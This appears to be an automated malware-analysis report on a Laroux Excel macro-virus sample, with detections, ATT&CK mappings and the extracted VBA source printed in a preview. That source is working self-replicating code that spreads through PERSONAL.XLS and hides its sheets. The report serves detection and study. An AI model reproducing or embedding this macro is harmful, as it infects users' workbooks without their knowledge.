MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as the Laroux macro virus, a known Excel-based threat. It contains an Auto_Open macro that copies the malicious macro to PERSONAL.XLS, ensuring execution whenever Excel is launched. This establishes persistence by modifying the startup behavior of Excel.
Heuristics 4
-
ClamAV: Xls.Trojan.Laroux-15 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Laroux-15
-
Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUSLegacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15086 bytes |
SHA-256: 40ca00f337e7e95cb890baf5ec1393f3742cba663c7fa352950955d19f62b02e |
|||
|
Detection
ClamAV:
Xls.Trojan.Laroux-15
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "larouXYZ"
Option Explicit
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "larouXYZ.larouXYZ"
End Sub
Sub larouXYZ()
On Error GoTo larouXYZ_Error
Dim Temp As String
Static Cnt As Integer
Application.ScreenUpdating = False
If Dir$(Application.StartupPath & "\" & "PERSONAL.XLS") = "" Then
Sheets("larouXYZ").Copy
Temp = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks(Temp).SaveAs Filename:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
Else
If Sheets(1).Name <> "larouXYZ" Then
Workbooks("PERSONAL.XLS").Sheets("larouXYZ").Copy Before:=ActiveWorkbook.Sheets(1)
End If
End If
Cnt = Cnt + 1
If Cnt > 7 Then
Cnt = 0
Print_larouXYZ
End If
Application.OnSheetActivate = "PERSONAL.XLS!larouXYZ.larouXYZ"
Windows("PERSONAL.XLS").Visible = False
Workbooks("PERSONAL.XLS").Saved = True
Sheets("larouXYZ").Visible = False
ActiveWorkbook.Saved = True
Application.ScreenUpdating = True
Exit Sub
larouXYZ_Error:
Exit Sub
End Sub
Sub Print_larouXYZ()
Attribute Print_larouXYZ.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo Print_larouXYZ_Error
Const MAX_COL = 62
Const MAX_ROW = 38
Dim Title(0 To MAX_ROW - 1) As String
Dim Row As Integer
Dim Col As Integer
Cells.ColumnWidth = 1
Cells.RowHeight = 7
Cells(1, 1) = "larouXYZ Ver0.01"
Title(0) = "11111000000000000000000000000000000000000000000000000000000000"
Title(1) = "01111000000000000000000000000000000000000000000000000000000000"
Title(2) = "01111000000000000000000000000000000000000000000000000000000000"
Title(3) = "01111000000000000000000000000000000000000000000000000000000000"
Title(4) = "01111000000000000000000000000000000000000000000000000000000000"
Title(5) = "01111000000000000000000000000000000000000000000000000000000000"
Title(6) = "01111000000111111000001111100111000001111110000011111001111100"
Title(7) = "01111000011000111100000111101111100011100111000001111000111100"
Title(8) = "01111000111000011110000111110111100111000011100001111000111100"
Title(9) = "01111000111100011110000111100011001111000011110001111000111100"
Title(10) = "01111000011000011110000111100000001111000011110001111000111100"
Title(11) = "01111000000001111110000111100000001111000011110001111000111100"
Title(12) = "01111000000110011110000111100000001111000011110001111000111100"
Title(13) = "01111000011100011110000111100000001111000011110001111000111100"
Title(14) = "01111000111100011110000111100000001111000011110001111000111100"
Title(15) = "01111000111100111110000111100000000111000011100001111001111100"
Title(16) = "01111000111111011111000111100000000011100111000001111111111100"
Title(17) = "11111100011110001110001111110000000001111110000000111110111110"
Title(18) = "00000000000000000000000000000000000000000000000000000000000000"
Title(19) = "00000000000000000000000000000000000000000000000000000000000000"
Title(20) = "00011111111100111111100111111110000011111001111111111111100000"
Title(21) = "00000111110000001110000011111000000000110001110000001111000000"
Title(22) = "00000111110000001000000001111100000000100001100000011111000000"
Title(23) = "00000011111000010000000000111100000001100001100000111110000000"
Title(24) = "00000001111000010000000000011110000001000001000000111100000000"
Title(25) = "00000000111100100000000000011110000010000000000001111100000000"
Title(26) = "00000000111111000000000000001111000010000000000001111000000000"
Title(27) = "00000000011110000000000000001111000100000000000011111000000000"
Title(28) = "00000000011111000000000000000111101000
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.